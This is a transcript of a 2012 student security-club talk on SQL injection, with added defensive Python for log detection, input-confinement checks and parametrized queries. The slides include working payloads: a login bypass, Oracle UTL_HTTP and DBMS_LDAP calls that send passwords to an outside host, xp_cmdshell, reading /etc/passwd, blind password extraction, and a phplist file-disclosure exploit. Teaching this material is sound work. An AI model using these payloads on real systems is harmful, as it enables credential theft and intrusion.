Let me SQL inject your heart! - ENSIMAG

Injection vulnerabilities are common in web applications. Some target databases: « SQL injections ». The impact of exploiting such vulnerabilities ranges from data retrieval, modification and deletion to, in certain cases, remote code execution!

Speakers: Franck De Goër, Fabien Duchene

Let me SQL inject your heart! SecurIMAG 2012-02-09

WARNING: SecurIMAG is a security club at Ensimag. Thoughts, ideas and opinions are not related to Ensimag. The authors assume no liability, including for errors and omissions.

¡¡_ (in)security we trust _!!

Post on 04-Jun-2020

TRANSCRIPT

Page 1: Let me SQL inject your heart! - ENSIMAG (ensiwiki.ensimag.fr/images/5/57/SecurIMAG-2012-02-09-Let..., 2012/02/09)


Page 2: Franck De Goër

SecurIMAG - SQLi – F. De Goër – F. Duchene – 09 Feb 2012

- Background: PT preparatory class at F. Buisson (Voiron, 38); first year at ENSIMAG
- Goals: ISI; PhD thesis (?); teaching and research
- Why security? It touches every branch of computer science, and a given problem admits multiple approaches.

Page 3: Outline

- Introduction
  - Injection
  - Attacking datastores (XPath, LDAP, SQL)
  - SQL language
- SQL injection
  - Definitions
  - Fingerprinting (specificities: Oracle, MS SQL, MySQL)
  - Some cool beef: first-order SQLi, second-order SQL injection, blind SQLi
- Automatic detection
- Counter-measures
- Conclusion

Page 4: Injection

« Security exploitation technique that permits injecting data and/or code »

Some injection examples:

Targeted system                   | What can be injected?           | Vulnerability examples
----------------------------------|---------------------------------|-----------------------------------------------
In-memory executable              | Assembly instructions           | Buffer overflow, use-after-free, …
Web server / CGI-like application | Additional HTML nodes           | Cross-site scripting (XSS), SVG injection, …
Data-stores                       | Additional DATA and/or COMMANDS | SQL injection, XPath injection, LDAP injection

Page 5: Web injection - intuitively

For a given transition (HTTP request / HTTP reply), an injection is the ability to craft an input parameter so that a subsystem that does not filter that input parameter enough uses it as data or code.

Input parameter examples:

- User-Agent:
- HTTP method: HEAD, GET…

Output examples:

- HTTP content
- HTTP-Only cookies
- HTML code

Page 6: Structured Query Language

- Relational databases. 1986. Current: SQL3 (SQL99). SQL grammar.
- A language for:
  - interrogating: SELECT
  - data manipulation: UPDATE, INSERT, DELETE
  - data definition: CREATE, ALTER, DROP
  - data access control: GRANT, REVOKE

Database: francky-vincent

Table: accounts

id | user      | password
---|-----------|--------------
1  | franck    | Ada.Text_Io
2  | securimag | quarante-deux
...

Table: news

id | date     | text
---|----------|-------------------------------
1  | 09-02-12 | SQLi – F. De Goër – F. Duchene
2  | ...      | ...

(A column is a field; a row is a record.)

Page 7: SQL query example

- Interrogating a database: extract of the SQL grammar for the SELECT statement:

SELECT * FROM table WHERE cond

E.g.: SELECT id FROM accounts WHERE user='franck' AND password='Ada.Text_Io'

(Run against the accounts and news tables of the francky-vincent database shown on page 6.)

Page 8: Outline

Page 9: SQL injection – intuitively (1/4)

User input = a set of input parameters.

Request path:

HTTP client (e.g. browser)  --HTML/HTTP-->  Web server, CGI (e.g. httpd+php)  --SQL API (e.g. mysql library)-->  SQL daemon (e.g. mysqld)

Source: The Web Application Hacker's Handbook, 2nd ed.

Page 10: SQL injection – intuitively (2/4)

HTML form:

HTTP request:

Page 11: SQL injection – intuitively (3/4)

Hidden.php (source code extract)

Some of the input parameters:

- GET - utilisateur=les blagues toto
- GET - motdepasse=sukZ!

SQL query (sent to the SQL driver via the SQL API):

SELECT * FROM data WHERE user='les blagues toto' AND password='sukZ!'

Page 12: SQL injection – intuitively (4/4)

Hidden.php (source code extract)

Some of the input parameters:

- GET - utilisateur=???
- GET - motdepasse=????

-> Problem: how to bypass that authentication scheme?

SQL query (sent to the SQL driver via the SQL API):

SELECT * FROM data WHERE user='les blagues toto' AND password='sukZ!' OR 69=69 --'

Page 13: SQL injection – intuitively - Franck DEMO

Page 14: SQL injection – a formal definition (1/3)

Source: Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)

Page 15: SQL injection – a formal definition (2/3)

Source: Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)

Page 16: SQL injection – a formal definition (3/3)

Source: Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)

Input parameter 1 / Input parameter 2

Page 17: SQL injection with uncaught error / exception

Depending on how the web application developer built the application:

- when we craft an input parameter and the evaluated query does not conform to the SQL grammar:
  - an ERROR and/or EXCEPTION MIGHT BE raised … or caught!
  - the SQL query that is sent to the SQL back-end is displayed

Page 18: Database system fingerprinting: WHY (1/4)

Useful for:

- information gathering (part of a pentester's job):
  - which SQL system is used? (software + version)
  - what is the SQL language version?
  - what privileges does the user have?
- stored procedures specific to an SQL server
- exploits specific to an SQL server version

Page 19: Database system fingerprinting: WHY (2/4)

DB \ impact: Oracle SQL

- HTTP, SMTP, TCP requests: UTL_SMTP, UTL_HTTP, UTL_TCP…
  toto' || UTL_HTTP_REQUEST('irc.car-online.fr:80/'||(SELECT%20%username,password%FROM%data%WHERE 1))--
- LDAP query! (11g): SYS.DBMS_LDAP.INIT('ldap.intranet:389',null) …
  SYS.DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.sub.car-online.fr',80)

Page 20: Database system fingerprinting: WHY (3/4)

DB \ impact: MS-SQL

- Remote command execution: stored procedure master..xp_cmdshell 'ipconfig /all > toto.txt'
- Ability to write on the filesystem: SELECT * INTO OUTFILE '\\\\fqdn-server\\sharename\\output.txt' FROM users;
- Shutdown!!: 'shutdown --

Page 21: Database system fingerprinting: WHY (4/4)

DB \ impact: MySQL

- Information disclosure: SELECT LOAD_FILE('/etc/passwd')
- Ability to write on the filesystem: SELECT * FROM data INTO OUTFILE '/tmp/wtf.txt'

Page 22: Database system fingerprinting: HOW

Try directly to inject parts of the previous SQL queries and check for any output indicating that an error occurred. SOME EXAMPLES:

DB \ impact | Causing a time delay                              | Database version             | Current user privileges
------------|---------------------------------------------------|------------------------------|------------------------
Oracle      | UTL_HTTP.REQUEST('http://car-online.fr/time/10/') | SELECT banner FROM v$version | SELECT privilege FROM session_privs
MS-SQL      | WAITFOR DELAY '0:0:10'                            | SELECT @@version             | SELECT grantee, table_name, privilege_type FROM INFORMATION_SCHEMA.TABLE_PRIVILEGES
MySQL       | SLEEP(100)                                        | SELECT @@version             | SELECT * FROM information_schema.user_privileges WHERE grantee = (SELECT user())

Source: The Web Application Hacker's Handbook, 2nd ed.

Page 23: Database system fingerprinting: Franck DEMO

Page 24: Blind SQL injection

Sometimes, when an SQL error is raised, the SQL query is NOT present in the web page (HTML) output!

"Blind SQLi"

Idea: discriminate the result by observing a DIFFERENCE in the OUTPUT (HTML) when the part of the SQL query the attacker controls evaluates to FALSE or to TRUE.

E.g.: … WHERE cond1 AND cond2 (cond2 is attacker controlled)

Page 25: Blind SQLi: obtaining information on records

SELECT id, record1 FROM table WHERE id = '$existing_id' GROUP BY 2; --';

# returns an error if nb records < 2, else the normal page

=> with several tests, it is possible to know the number of records. To know the record names, brute-force:

SELECT id, record1 FROM table WHERE id = '$existing_id' GROUP BY password; //';

Page 26: Blind SQLi: obtaining the length of a password

For instance, if the inputs are GET parameters:

http://vulnerable-web-site.com/script.php?id=1 AND length(password)=$i

# returns an error if length(password) != $i, else the normal page

=> by incrementing $i until the normal page appears, we learn the length of the password

Page 27: Blind SQLi: obtaining an integer value (1/5)

Page 28: Blind SQLi: obtaining an integer value (2/5)

Page 29: Blind SQLi: obtaining an integer value (3/)

Page 30: Blind SQLi: obtaining an integer value (3/5)

Page 31: Blind SQLi: obtaining an integer value (4/5)

Page 32: Blind SQLi: obtaining an integer value (5/5)

Page 33: Blind SQLi: obtaining the characters of a password

Get the password characters: clever brute-force

http://vulnerable-web-site.com/script.php?id=1 and substring(password,$i,1)=char($ascii_code)

# returns an error if the i-th character isn't char($ascii_code), else the normal page

=> by testing values of $ascii_code, we learn the i-th password character
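The fingerprinting probes of pages 19-22 and the length()/substring() loop of pages 26 and 33 both leave a recognisable trail in the web server's access log. The following Python is an added defender's example, not code from the talk: it parses constructed combined-format log lines (the signature strings come from the talk's tables; the log lines, hosts and threshold are made up), names the back-end dialect a probe targets, and flags a client that sends many distinct blind comparisons against one path.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Probe fragments taken from the fingerprinting tables on pages 19-22, grouped by
# the back-end whose dialect they belong to (upper-cased for case-insensitive matching).
DIALECT_SIGNATURES = {
    "Oracle": ("UTL_HTTP", "UTL_SMTP", "UTL_TCP", "DBMS_LDAP", "V$VERSION", "SESSION_PRIVS"),
    "MS-SQL": ("XP_CMDSHELL", "WAITFOR DELAY", "INFORMATION_SCHEMA.TABLE_PRIVILEGES"),
    "MySQL": ("LOAD_FILE(", "INTO OUTFILE", "SLEEP(", "INFORMATION_SCHEMA.USER_PRIVILEGES"),
}
# @@version is valid on both MS-SQL and MySQL, so on its own it only rules out Oracle.
SHARED_SIGNATURES = ("@@VERSION",)

# Shape of the blind probes on pages 26 and 33:
#   ... AND length(password)=$i
#   ... AND substring(password,$i,1)=char($ascii_code)
BLIND_PROBE = re.compile(r"\b(length|substring)\s*\(\s*\w+[^=]*=\s*(char\(\d+\)|\d+)", re.I)

# Combined-log prefix: client, identd, user, [time] "METHOD target ..."
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+)')


def parse_line(line):
    """Return (client ip, path, decoded query string), or None for an unparseable line."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    # Undo percent-encoding and '+' so that 'AND+1%3D1' is compared as 'AND 1=1'.
    return m.group("ip"), path, unquote_plus(query)


def fingerprint_dialects(query):
    """Name the back-ends whose fingerprinting fragments appear in a decoded query."""
    upper = query.upper()
    hits = {db for db, sigs in DIALECT_SIGNATURES.items() if any(s in upper for s in sigs)}
    if not hits and any(s in upper for s in SHARED_SIGNATURES):
        hits = {"MS-SQL", "MySQL"}
    return hits


def analyse(lines, blind_threshold=5):
    """Flag every fingerprinting probe, plus each (client, path) pair that sent at least
    blind_threshold distinct length()/substring() comparisons: the loop of a blind SQLi."""
    fingerprint_hits = []
    blind_probes = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, path, query = parsed
        dialects = fingerprint_dialects(query)
        if dialects:
            fingerprint_hits.append((ip, path, sorted(dialects)))
        for m in BLIND_PROBE.finditer(query):
            blind_probes[(ip, path)].add(m.group(0).lower())
    blind_hits = [(ip, path, len(probes))
                  for (ip, path), probes in blind_probes.items() if len(probes) >= blind_threshold]
    return {"fingerprint": fingerprint_hits, "blind": blind_hits}


# Constructed sample access-log lines (made up for this example, not from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Feb/2012:10:00:01 +0100] "GET /script.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [09/Feb/2012:10:00:02 +0100] "GET /script.php?id=1%20AND%20length(password)=8 HTTP/1.1" 200 512',
    '10.0.0.7 - - [09/Feb/2012:10:00:03 +0100] "GET /script.php?id=1+AND+substring(password,1,1)=char(97) HTTP/1.1" 500 93',
    '10.0.0.7 - - [09/Feb/2012:10:00:04 +0100] "GET /script.php?id=1+AND+substring(password,1,1)=char(98) HTTP/1.1" 500 93',
    '10.0.0.7 - - [09/Feb/2012:10:00:05 +0100] "GET /script.php?id=1+AND+substring(password,1,1)=char(99) HTTP/1.1" 200 512',
    '10.0.0.7 - - [09/Feb/2012:10:00:06 +0100] "GET /script.php?id=1+AND+substring(password,2,1)=char(97) HTTP/1.1" 200 512',
    '10.0.0.9 - - [09/Feb/2012:10:00:07 +0100] "GET /script.php?id=1%27%20AND%20(SELECT%20banner%20FROM%20v$version)-- HTTP/1.1" 500 93',
    '10.0.0.9 - - [09/Feb/2012:10:00:08 +0100] "GET /script.php?id=1;WAITFOR%20DELAY%20%270:0:10%27-- HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Feb/2012:10:00:09 +0100] "GET /news.php?id=2 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for kind, hits in analyse(SAMPLE_LOG).items():
        for hit in hits:
            print(kind, *hit)
```

The blind-probe counter keys on distinct comparison values rather than request volume, so a single user refreshing a page never trips it, while the per-character loop of page 33 does after a handful of guesses.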

Page 34: Blind SQLi – StalkR's write-up for phplist, SMPCTF 2010

From blind SQL injection to local file inclusion! http://blog.stalkr.net/2010/07/smpctf-challenge-11-write-up-phplist.html#more

Page 35: (screenshot, not in the transcript)

Page 36: Where?

http://localhost/ex1/admin/?page=users&start=0&find=juanito&findby=email&sortby=0&sortorder=desc&id=0&find=juanito&findby=email

Page 37: Filtering?

SQLi query such as "SELECT field1, field2 FROM table1 WHERE condition1 AND value2=[user_controlled_field]"

User controlled values? findby, sortorder, …

Page 38: Interesting field for the condition?

findby=email and findby=1 give the same page output

Page 39: findby=1

Page 40: findby=1 AND 1 gives the same page output! Nice start…

Page 41: findby=1 AND 0

Page 42: Blind SQLi discriminant

A string present on the web page when the condition evaluates to false, e.g.:

- "Database error"
- "You have an error"
- …

Page 43: Ex1 – Blind SQLi to LFI

Requires the FILE privilege (LOAD_FILE). Problem: filtering on quotes in the findby parameter -> use hex-encoded values.

findby=1 AND substr(lpad(bin(ord(substr(load_file(0x'+file.encode('hex')+'),'+str(charpos+1)+',1))),8,0),'+str(bitpos+1)+',1)=1

Page 44: StalkR's script, which I modified to take a user-provided discriminant into account and to check that the file exists

ensimag-student@bt:~/Desktop/ex1-script$ ./phplist_21012_sql_injection_local_file_disclosure.py

[*] phplist 2.10.12 SQL injection, local file disclosure

Usage: ./phplist_21012_sql_injection_local_file_disclosure.py <host> <path to phplist> <admin username> <admin password> <file to get> <discriminate_string_when_condition_evaluated_to_false>

Page 45: (screenshot, not in the transcript)

Page 46: (screenshot, not in the transcript)

Page 47: Automatic (and formal) detection

From the server side: observe whether the user-controlled input parameter is syntactically confined. If it is not, this is a sufficient condition for saying it is an injection!

Source: Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008)
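The server-side check described above can be approximated at the token level: splice the input into the query and accept it only if it stays inside one literal. The following Python is an added illustration, not Wassermann's implementation nor code from the talk; the `{}` placeholder convention, the tiny tokenizer and the `build_if_confined` guard are assumptions of this example.

```python
import re

# Minimal SQL tokenizer: enough to tell literal tokens from everything else.
# '' inside a string is an escaped quote; an unterminated quote falls through to "other".
TOKEN = re.compile(r"""
    (?P<string>'(?:[^']|'')*')
  | (?P<number>\d+(?:\.\d+)?)
  | (?P<comment>--[^\n]*|/\*.*?\*/)
  | (?P<ident>[A-Za-z_][A-Za-z_0-9$.@]*)
  | (?P<space>\s+)
  | (?P<other>.)
""", re.VERBOSE | re.DOTALL)


def tokens(sql):
    """Yield (kind, start, end) for each token of sql, left to right."""
    pos = 0
    while pos < len(sql):
        m = TOKEN.match(sql, pos)
        yield m.lastgroup, m.start(), m.end()
        pos = m.end()


def is_syntactically_confined(template, value):
    """Wassermann's criterion, approximated: splice value into the template at its single
    '{}' placeholder and accept only if every character of the value lands strictly inside
    one string literal (so the quotes around it are the template's own) or exactly covers
    one numeric literal.  Anything else means the input contributed structure (operators,
    keywords, comment markers, a closing quote) to the query."""
    start = template.index("{}")
    end = start + len(value)
    sql = template.replace("{}", value, 1)
    for kind, s, e in tokens(sql):
        if kind == "string" and s < start and end < e:
            return True
        if kind == "number" and s <= start and end <= e:
            return True
        if s >= end:
            break
    return False


def build_if_confined(template, value):
    """Server-side guard from page 47: refuse to build a query whose user input is not
    syntactically confined, instead of trying to escape the input."""
    if not is_syntactically_confined(template, value):
        raise ValueError("input is not syntactically confined: possible SQL injection")
    return template.replace("{}", value, 1)
```

The check is deliberately conservative: a value such as `-1` in a numeric slot is rejected because the sign is a separate token, which is the safe direction for a detector to fail.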

Page 48: Automatic detection: sqlmap.py

- client side
- Python script
- ability to fingerprint various SQL back-ends: http://sqlmap.sourceforge.net/doc/README.pdf

Page 49: Automatic detection: sqlmap.py - Franck DEMO

Page 50: Counter-measures: input filters

Input filters: some developers assume that filtering the input is enough, which is sometimes not the case.

!%^$#! This does, however, complicate the injection!

Filter examples:

- PHP: addslashes(). The injection will still work if the query is like:
  … WHERE integer_field=[USER_CONTROLLED_INPUT]

Page 51: Input filters and second-order SQL injections (1/2)

0. Filter: add a second quote
1. New user registration: input1= meeraque' ; input2= Mj|_|@n|t0
   INSERT INTO data (username,password) VALUES('meeraque''', 'Mj|_|@n|t0')
   => the record will contain meeraque'

Page 52: Input filters and second-order SQL injections (2/2)

2. Change password: SELECT password FROM data WHERE username='meeraque''
   MySQL error! ERROR: Unclosed quote @ 42 STR: '
3. Exploitation:
   3.1. Register a user with username ' OR 1 in (SELECT password FROM data WHERE username='admeenistraore')
   3.2. Try to change the password. P0wn3d! Admin password in the MySQL error message!
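Both filter failures of pages 50-52 can be reproduced offline. The following Python is an added example, not code from the talk: it uses the standard-library sqlite3 module in place of MySQL, a `double_quotes` function as the page-51 filter, a Python stand-in for PHP's addslashes(), and a constructed admin row; the table layout and the `meeraque'` registration follow the slides.

```python
import re
import sqlite3


def double_quotes(value):
    """The page-51 filter: escape a single quote by doubling it."""
    return value.replace("'", "''")


def addslashes(value):
    """Python stand-in for PHP's addslashes(): backslash-escape ', ", backslash and NUL."""
    return re.sub(r"(['\"\\\x00])", r"\\\1", value)


def fresh_db():
    """In-memory version of the slides' 'data' table, seeded with one admin row
    (constructed values, not the talk's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE data (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO data (username, password) VALUES ('admeenistraore', 's3cret')")
    return conn


def register(conn, username, password):
    """Step 1: registration filters both inputs, then concatenates them into the INSERT.
    Returns the SQL text so the effect of the filter can be inspected."""
    sql = "INSERT INTO data (username, password) VALUES ('%s', '%s')" % (
        double_quotes(username), double_quotes(password))
    conn.execute(sql)
    return sql


def stored_username(conn, username):
    """What actually landed in the table: the SQL parser turned '' back into one quote."""
    row = conn.execute("SELECT username FROM data WHERE username = ?", (username,)).fetchone()
    return row[0]


def change_password_query(conn, username):
    """Step 2: the password-change code trusts the value it read back from the database
    and splices it in unfiltered.  The quote is back, and so is the injection."""
    return "SELECT password FROM data WHERE username='%s'" % stored_username(conn, username)


def change_password(conn, username):
    """Run the step-2 query.  Returns ('ok', row) or ('error', message); the message is
    what a careless page would print, which is the channel page 52 exploits."""
    try:
        return "ok", conn.execute(change_password_query(conn, username)).fetchone()
    except sqlite3.OperationalError as exc:
        return "error", str(exc)


def count_by_id(conn, user_input):
    """Page 50: addslashes() in front of an unquoted integer field.  There is nothing to
    escape in '1 OR 1=1', so the input is spliced in verbatim and rewrites the WHERE clause."""
    sql = "SELECT COUNT(*) FROM data WHERE id=" + addslashes(user_input)
    return conn.execute(sql).fetchone()[0]
```

The lesson is the one the slides draw: a filter applied at one entry point does not protect query-building code elsewhere, and escaping quotes does nothing for a value that is not inside quotes.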

Page 53: Counter-measures: parametrized statements

- PROBLEM: the SQL injection problem comes from an unclear separation between the DATA and COMMAND parts when building the SQL query
- parametrized statements:

Page 54: Counter-measures: parametrized statements (continued)
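The body of this slide is not in the transcript, so here is the Hidden.php login of pages 11-12 written both ways. This is an added Python example, not the talk's code: sqlite3 from the standard library stands in for MySQL, the `data` rows are constructed, and the `?` placeholder syntax is sqlite3's (PHP's mysqli and PDO offer the same binding mechanism under other names).

```python
import sqlite3


def fresh_db():
    """In-memory stand-in for the 'data' table queried by Hidden.php (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE data (id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO data (user, password) VALUES (?, ?)",
                     [("les blagues toto", "sukZ!"), ("franck", "Ada.Text_Io")])
    return conn


def build_query_concat(user, password):
    """What Hidden.php does: both GET parameters are pasted into the query text, so the
    SQL parser cannot tell the developer's COMMAND part from the user's DATA part."""
    return "SELECT * FROM data WHERE user='%s' AND password='%s'" % (user, password)


def login_concat(conn, user, password):
    """Vulnerable login: returns the rows matched by the concatenated query.  With the
    page-12 input the OR 69=69 clause is parsed as SQL and every row comes back."""
    return conn.execute(build_query_concat(user, password)).fetchall()


def login_parametrized(conn, user, password):
    """Counter-measure: the statement text is fixed and contains no user data.  The values
    are bound separately and compared as whole strings, quotes and comment markers
    included, so the same input simply fails to match any password."""
    sql = "SELECT * FROM data WHERE user=? AND password=?"
    return conn.execute(sql, (user, password)).fetchall()
```

Note that the parametrized version needs no escaping filter at all: a legitimate password containing a quote is matched literally, which is also what defeats the second-order case of pages 51-52.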

Page 55: Outline

Page 56: No questions please!

We have exhausted our knowledge… (and frankly, I feel more like starting the apéro $